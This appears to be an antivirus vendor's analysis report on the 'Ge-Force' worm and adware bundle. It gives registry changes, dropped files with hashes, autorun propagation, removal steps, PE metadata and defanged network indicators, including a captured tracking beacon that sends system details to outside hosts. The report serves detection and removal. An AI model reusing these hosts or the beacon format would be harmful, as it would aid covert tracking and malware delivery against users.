The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process Ge-Force-bg.exe:2632 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 47 B3 F2 5A 84 9B 30 E9 C3 A5 17 05 08 53 FC"
Dropped PE files
MD5 | File path |
---|---|
0fb8fdff654dea1444a1733cfb79149d | c:\Program Files\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe |
e19b738b235ea40fc075f8627c5472b9 | c:\Program Files\Ge-Force\Ge-Force-bg.exe |
11ccef28d3bfd871ab173a7e03f57b04 | c:\Program Files\Ge-Force\Ge-Force-bho.dll |
303913dad1bffa0af8c207f29489f336 | c:\Program Files\Ge-Force\Ge-Force-buttonutil.dll |
ce4ccca778189fef1de87a66f21ac3e1 | c:\Program Files\Ge-Force\Ge-Force-buttonutil.exe |
26461d0b7a6729c1263bc94a65753246 | c:\Program Files\Ge-Force\Ge-Force-codedownloader.exe |
e63daa30be43031462b6a86267431b9c | c:\Program Files\Ge-Force\Uninstall.exe |
5981f7b76df711e10c552db4ca62ab0a | c:\Program Files\Ge-Force\utils.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Idzcf & co.
Product Name: Id-Eqhowiozunlmy
Product Version:
Legal Copyright: Copyright Vylorzwjeixeou
Legal Trademarks: Eqhowiozunlmy is a trademark of Kuoyj
Original Filename:
Internal Name:
File Version: 15.4.13.18
File Description: Teocxdjqh
Comments: comment on Khtmovq
Language: Language Neutral
Company Name: Idzcf & co.Product Name: Id-EqhowiozunlmyProduct Version: Legal Copyright: Copyright VylorzwjeixeouLegal Trademarks: Eqhowiozunlmy is a trademark of KuoyjOriginal Filename: Internal Name: File Version: 15.4.13.18File Description: TeocxdjqhComments: comment on KhtmovqLanguage: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34108 | 34304 | 4.23004 | 63bb1ab888510a64d453326c977db871 |
.data | 40960 | 144 | 512 | 0.831186 | 28f29d4150b83e7faae233a71c5cab15 |
.rdata | 45056 | 9272 | 9728 | 3.95241 | f652035f54b3a74c89f7bb1cb907d4d2 |
.bss | 57344 | 297092 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 356352 | 4868 | 5120 | 3.6057 | 0d5c3df1017a50cd5a6baab82c884d87 |
.ndata | 364544 | 770048 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 1134592 | 69632 | 69120 | 5.50093 | 8fe4bd36b5bf2022d4edfda2dd0e3192 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://ipgeoapi.com/ | 23.21.123.184 |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 | |
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/356.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/193.js?ver=9&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/288.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/350.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/337.js?ver=1&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=11&rnd=41 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=118&rnd=41 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 | |
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 | |
hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 | |
hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | |
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | 69.16.175.10 |
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/356.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/350.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/193.js?ver=9&rnd=41 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 | 69.16.175.10 |
hxxp://logs.newstatsclientcloud.com/monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/288.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/91.js?ver=118&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 | 69.16.175.10 |
hxxp://stats.newstatsclientcloud.com/installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 | 54.231.32.196 |
hxxp://stats.newstatsclientcloud.com/apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 | 54.231.32.196 |
hxxp://js.newstatsdemosrv.com/plugins/mins/262.js?ver=2&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsclientcloud.com/plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/337.js?ver=1&rnd=41 | 69.16.175.10 |
hxxp://js.newstatsdemosrv.com/plugins/mins/184.js?ver=11&rnd=41 | 69.16.175.10 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /installer.gif?action=started&app=69129&appver=0&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=6&rnd=1421039409 HTTP/1.1
Host: stats.newstatsclientcloud.com
